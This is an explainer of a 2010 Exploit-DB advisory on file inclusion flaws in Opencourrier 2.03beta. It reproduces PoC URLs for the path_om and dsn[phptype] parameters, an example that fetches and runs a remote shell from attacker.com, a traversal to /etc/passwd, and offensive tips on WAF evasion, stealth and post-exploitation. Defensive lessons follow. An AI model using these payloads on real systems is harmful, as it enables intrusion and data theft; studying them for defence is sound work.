Understanding Opencourrier 2.03beta RFI/LFI Vulnerabilities

Understanding Opencourrier 2.03beta RFI/LFI Vulnerabilities
What this paper is
This paper, published on April 26, 2010, by cr4wl3r from the Inj3ct0r Team, describes a Remote File Inclusion (RFI) and Local File Inclusion (LFI) vulnerability in Opencourrier version 2.03beta. It provides Proof-of-Concept (PoC) URLs demonstrating how to exploit these vulnerabilities to include external or local files, potentially leading to code execution.
Simple technical breakdown
The core of the vulnerability lies in how the Opencourrier application handles user-supplied input, specifically parameters like path_om and dsn[phptype]. When these parameters are used in a way that allows them to be directly included in a require or include statement within the PHP code, an attacker can manipulate them.
- RFI: An attacker can provide a URL pointing to a malicious PHP file hosted on their own server. If the vulnerable application includes this URL, the attacker's code will be executed on the target server.
- LFI: An attacker can provide a path to a sensitive file on the target server (e.g.,
/etc/passwd). If the application includes this path, the attacker can view the contents of that file. The paper also hints at using a null byte (%00) for LFI, which can sometimes terminate string processing prematurely, allowing for file inclusion even if the application tries to append an extension.
Complete code and payload walkthrough
The provided paper does not contain executable code or shellcode in the traditional sense. Instead, it offers URLs that act as the "exploit" by demonstrating how to craft malicious requests. The "payload" is the malicious content (either a remote script or a local file path) that the vulnerable application is tricked into including.
Let's break down the PoC examples:
RFI PoC Examples:
http://server/[path]/obj/bible.class.php?path_om=[Shell]http://server/[path]/obj/dossier.class.php?pservice.class.phpcategorie.class.php?path_om=[Shell]http://server/[path]/obj/collectivite.class.php?path_om=[Shell]- ... and so on for other
.class.phpfiles.
Explanation:
http://server/[path]/: This represents the base URL of the vulnerable Opencourrier installation.obj/bible.class.php(and other.class.phpfiles): These are legitimate PHP files within the Opencourrier application that likely contain code to process or include other files. The vulnerability is triggered when these files process thepath_omparameter.?path_om=[Shell]: This is the crucial part.path_omis a parameter that, when processed by the vulnerable script (e.g.,bible.class.php), is likely used in a PHPincludeorrequirestatement.[Shell]is a placeholder for the attacker's malicious payload.- For RFI:
[Shell]would be a URL pointing to a PHP script on the attacker's server. For example:http://attacker.com/shell.txt. The vulnerable server would then fetch and executeshell.txt. Theshell.txtfile would contain PHP code designed to give the attacker control, such as a web shell. - For LFI:
[Shell]would be a path to a local file on the target server. For example:../../../../etc/passwd. The vulnerable server would then include and display the contents of/etc/passwd.
LFI PoC Example:
http://server/[path]/scr/soustab.php?dsn[phptype]=[LFI%00]
Explanation:
http://server/[path]/scr/soustab.php: Another vulnerable script within the application.?dsn[phptype]=[LFI%00]:dsn[phptype]is a parameter that is likely processed in a way that leads to a file inclusion. The nested array structure (dsn[phptype]) suggests it might be part of a database connection configuration or similar.[LFI%00]is the payload.[LFI]would be the path to the local file to be included (e.g.,../../../../etc/passwd).%00is the URL-encoded representation of the null byte character (\0). In older PHP versions, a null byte could terminate a string, preventing any appended file extensions from being added by the application. This would allow an attacker to include arbitrary files even if the application was designed to only include files with a specific extension (like.php).
Mapping of code fragment/block -> practical purpose:
obj/*.class.phpfiles (e.g.,bible.class.php): These are the vulnerable script entry points. They likely contain code that dynamically includes other files based on parameters.path_om=[Shell]parameter: This is the RFI/LFI vector. It's the user-controlled input that gets included.scr/soustab.phpscript: Another vulnerable script entry point.dsn[phptype]=[LFI%00]parameter: This is the LFI vector, potentially leveraging null byte termination.[Shell](placeholder): Represents the attacker-controlled content (remote URL for RFI, local path for LFI).%00(null byte): A technique to bypass file extension restrictions in LFI attacks.
Practical details for offensive operations teams
Required Access Level:
- Network Access: The attacker needs to be able to send HTTP requests to the target web server.
- No Authentication (typically): These vulnerabilities are often found in publicly accessible parts of a web application, meaning no login is usually required.
Lab Preconditions:
- Target Environment: A local or remote Opencourrier 2.03beta installation. This is crucial for testing and safe exploitation.
- Web Server: A functional web server (e.g., Apache, Nginx) with PHP configured.
- Remote Server (for RFI): An attacker-controlled server capable of serving PHP files over HTTP. This server will host the malicious payload.
- Network Connectivity: The target server must be able to reach the attacker's remote server for RFI attacks.
Tooling Assumptions:
- Web Browser: For manual testing and reconnaissance.
- Burp Suite / OWASP ZAP: For intercepting and modifying HTTP requests, making it easier to craft malicious payloads.
- Curl: For scripting and automating requests.
- Metasploit Framework (optional): May contain modules for RFI/LFI exploitation or post-exploitation.
- Custom Scripts: Python or PHP scripts can be used to automate scanning for vulnerable URLs and testing payloads.
Execution Pitfalls:
- WAF/IPS Evasion: Web Application Firewalls (WAFs) and Intrusion Prevention Systems (IPS) might detect common RFI/LFI patterns. Attackers may need to use encoding, obfuscation, or different inclusion techniques to bypass them.
- PHP Configuration (
allow_url_fopen,allow_url_include): RFI attacks rely onallow_url_fopenbeing enabled in the target'sphp.iniconfiguration.allow_url_includemust also be enabled for RFI to execute included files as PHP code. If these are disabled, RFI is not possible. - File Path Restrictions: The application might have strict controls on what files can be included, even for LFI.
- Null Byte Bypass: The null byte (
%00) bypass for LFI is dependent on the PHP version and how the string is handled. It's less effective in modern PHP versions. - Path Traversal Depth: The attacker needs to correctly guess the number of
../needed to reach the desired file for LFI. - Payload Effectiveness: The attacker's remote PHP script (for RFI) or chosen local file (for LFI) must be correctly crafted to achieve the desired outcome. A poorly written web shell will be useless.
- Error Handling: Verbose error messages from the web server or PHP can reveal information about the file system or configuration, aiding exploitation. Conversely, suppressed errors can make exploitation harder.
Tradecraft Considerations:
- Reconnaissance: Identify potential vulnerable URLs by looking for parameters that resemble file paths or include statements. Tools like Nikto or custom scanners can help.
- Payload Staging: For RFI, host a well-crafted web shell on a reliable server. For LFI, identify sensitive files that are likely to exist and be readable.
- Stealth: Avoid noisy scanning. Use targeted requests and consider timing.
- Post-Exploitation: Once a shell is obtained via RFI, the focus shifts to privilege escalation, lateral movement, and data exfiltration, all while maintaining a low profile.
Where this was used and when
- Software: Opencourrier version 2.03beta.
- Context: This vulnerability was discovered and published in April 2010. It was likely exploited against web applications using this specific version of Opencourrier. Opencourrier itself is a web-based mail management system, often used by local government entities in French-speaking regions. Therefore, potential targets would be organizations running this software for their internal mail handling.
Defensive lessons for modern teams
- Input Validation is Paramount: Always validate and sanitize all user-supplied input, especially when it's used in file operations or dynamic code execution. Never trust external data.
- Secure File Inclusion Practices:
- Whitelist Allowed Files: Instead of blacklisting, maintain a strict whitelist of allowed files that can be included.
- Avoid Dynamic Includes: If possible, avoid including files based on user input. Use predefined, hardcoded file paths.
- Use
require_once: This ensures a file is included only once, preventing potential re-inclusion issues.
- Disable Dangerous PHP Configurations:
- Ensure
allow_url_fopenandallow_url_includeare disabled inphp.iniunless absolutely necessary for legitimate functionality (which is rare for most web applications). - Configure
open_basedirto restrict PHP's access to the file system to only necessary directories.
- Ensure
- Keep Software Updated: Regularly update all web applications and their dependencies to patch known vulnerabilities. Opencourrier 2.03beta is very old; any current deployment would be highly vulnerable.
- Web Application Firewalls (WAFs): Deploy and properly configure WAFs to detect and block common attack patterns like RFI/LFI attempts. However, WAFs are not a silver bullet and should be part of a layered defense.
- Security Audits and Code Reviews: Regularly perform security audits and code reviews to identify and fix vulnerabilities before they can be exploited.
ASCII visual (if applicable)
This paper describes a web application vulnerability, so a simple flow diagram illustrating the request/response cycle and the point of inclusion is applicable.
+-----------------+ +-----------------+ +-----------------+
| Attacker's | ----> | Target Web | ----> | Vulnerable PHP |
| Server (for RFI)| | Server | | Script |
+-----------------+ +-----------------+ +-----------------+
^ |
| (Malicious PHP Code) | (Includes file based on user input)
| v
| +-----------------+
| | Target File |
| | System |
| | (Local file for |
| | LFI, or remote |
| | URL for RFI) |
+--------------------------------------------+-----------------+Explanation of Diagram:
- The Attacker's Server (only for RFI) hosts a malicious PHP script.
- The Target Web Server receives an HTTP request from the attacker.
- The request is directed to a Vulnerable PHP Script within Opencourrier.
- This script, due to the vulnerability, takes a parameter (e.g.,
path_om) and uses it to include a file. - The Target File System is accessed.
- For RFI, the vulnerable script fetches and executes code from the Attacker's Server.
- For LFI, the vulnerable script includes and displays the content of a file from the Target File System.
Source references
- Paper ID: 12398
- Paper Title: Opencourrier 2.03beta - Local File Inclusion / Remote File Inclusion
- Author: cr4wl3r
- Published: 2010-04-26
- Keywords: PHP, webapps
- Paper URL: https://www.exploit-db.com/papers/12398
- Original Source Content: Provided in the prompt.
Original Exploit-DB Content (Verbatim)
===================================================================
Opencourrier 2.03beta (RFI/LFI) Multiple File Include Vulnerability
===================================================================
[+] Opencourrier 2.03beta (RFI/LFI) Multiple File Include Vulnerability
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ###################################### 1
0 I'm cr4wl3r member from Inj3ct0r Team 1
1 ###################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
[+] Discovered By: cr4wl3r
[+] Download: https://adullact.net/frs/download.php/4708/openmairie_courrier2_2.03beta.zip
[+] Greetz: All member inj3ct0r.com, manadocoding.net, sekuritionline.net, gcc.web.id
[+] Thanks to: opt!x hacker, xoron, cyberlog, irvian, antihack, angky.tatoki,
EA ngel, zvtral, s4va, bL4Ck_3n91n3, untouch, team_elite, zreg, mywisdom,
SENOT, kec0a, d3viln3t, p4p4y, cybertomat, etaxCrew, emen, and all my friend
[+] PoC:
[~] RFI:
http://server/[path]/obj/bible.class.php?path_om=[Shell]
http://server/[path]/obj/dossier.class.php?pservice.class.phpcategorie.class.php?path_om=[Shell]
http://server/[path]/obj/collectivite.class.php?path_om=[Shell]
http://server/[path]/obj/droit.class.php?path_om=[Shell]
http://server/[path]/obj/tache.class.php?path_om=[Shell]
http://server/[path]/obj/emetteur.class.php?path_om=[Shell]
http://server/[path]/obj/utilisateur.class.php?path_om=[Shell]
http://server/[path]/obj/courrier.recherche.tab.class.php?path_om=[Shell]
http://server/[path]/obj/profil.class.php?path_om=[Shell]
[~] LFI:
http://server/[path]/scr/soustab.php?dsn[phptype]=[LFI%00]
# Inj3ct0r.com [2010-04-26]